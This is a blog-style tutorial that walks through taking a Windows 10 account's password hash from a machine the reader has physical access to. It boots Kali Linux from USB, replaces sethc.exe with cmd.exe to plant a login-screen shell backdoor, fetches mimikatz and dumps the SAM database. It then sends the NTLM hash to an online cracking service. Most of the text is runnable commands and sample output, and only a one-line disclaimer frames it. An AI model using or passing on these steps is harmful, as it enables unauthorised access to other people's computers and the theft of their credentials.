Get Any Windows 10 Anniversary Password Hash in 16 Steps

Karl Is WrightComputer Repair, DIY, Penetration Testing, Tutorial, Windows Tips

Windows 10 Password Hacking

(Even with Anniversary Update)

NOTE: The content of this tutorial is for INFORMATIONAL PURPOSES ONLY

I do not condone any unethical activity

Step 1 – Get a USB stick (4GB fine)

Step 2 – Download Kali Live DVD – direct download link  — Instructions for n00bs

Step 3 – Download Rufus (they have a portable edition for those who hate installing new software)

Step 4 – Use Rufus to put Kali Live on USB

Insert your USB stick of choice into your potato (it will be formatted, so make sure it’s got nothing important on it!)

Open up Rufus, follow instructions (if it asks for either ISO or DD mode, I choose ISO)

Step 5 – On affected computer, boot to Kali Live USB (username is root, password is toor)

Step 6 – Open up a terminal in Kali and run the following:

sfdisk -l -uM

This will list all the partitions on all your computer’s drives and give you the sizes of each. You need to pick out the appropriate partition ie,

/dev/sda2 71680+ 476938 405259- 414984520+ NTFS

Step 7 – mount local Windows 10 disk by using following:

First create a mountpoint,

mkdir /media/windows

Now we can mount the local drive. Remember to replace * with the appropriate partition.

mount -t ntfs-3g -o remove_hiberfile /dev/sda* /media/windows

NOTE: Windows 10 no longer “shuts down” normally, the way older Win OS’s did. Instead it hybernates. You’ll need to remove the hybernation file, or the linux kernel will force it to load in Read-Only mode.

Step 8 – Switch up the cmd and sethc files.

Open a Terminal

cd /media/windows/Windows/System32

mv sethc.exe sethc.old

rm sethc.exe

cp cmd.exe sethc.exe

Note: This replaces the sticky-keys program with a command shell. When we head back to the windows login screen we can get into a shell without logging in by pressing the SHIFT key x5.

Step 9 – Change Dir and ensure you have 7z

cd /media/windows/

apt install p7zip

Step 10 – Get mimikatz

wget "https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20170618/mimikatz_trunk.7z"

7za -x -o mimikatz mimikatz_trunk.7z

Step 11 –  Reboot into Windows 10

Step 12 – At the login screen hit SHIFT x5

Step 13 – When the command shell pops up,

cd C:\mimikatz\x64

mimikatz.exe

Step 14 – Run the series of commands in bold to get your password hash

The following is taken from the mimikatz github wiki

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::whoami
 * Process Token : 623884       vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000  (14g,24p)       Primary
 * Thread Token  : no token

mimikatz # token::elevate
Token Id  : 0
User name :
SID name  : AUTORITE NT\Système

228     24215           AUTORITE NT\Système     S-1-5-18        (04g,30p)       Primary
 -> Impersonated !
 * Process Token : 623884       vm-w7-ult-x\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000  (14g,24p)       Primary
 * Thread Token  : 624196       AUTORITE NT\Système     S-1-5-18        (04g,30p)       Impersonation (Delegation)

mimikatz # lsadump::sam

Look for the user account you want the hash for,


RID  : 000003e8 (1000)
User : Gentil Kiwi
LM   :
NTLM : cc36cf7a8514893efccd332446158b1a

What follows after NTLM is the user account’s password in encrypted form.

btw, as an aside, if the NTLM hash reads;

31d6cfe0d16ae931b73c59d7e0c089c0

Then the password is blank; there is no password.

Step 15 – Now you have your password hash. Take it, write it down, whatever, just take it and enter it into the appropriate field over at HashKiller.co.uk and see if the cloud can decipher the password.

Step 16 – Enjoy. Live life. Eat cake.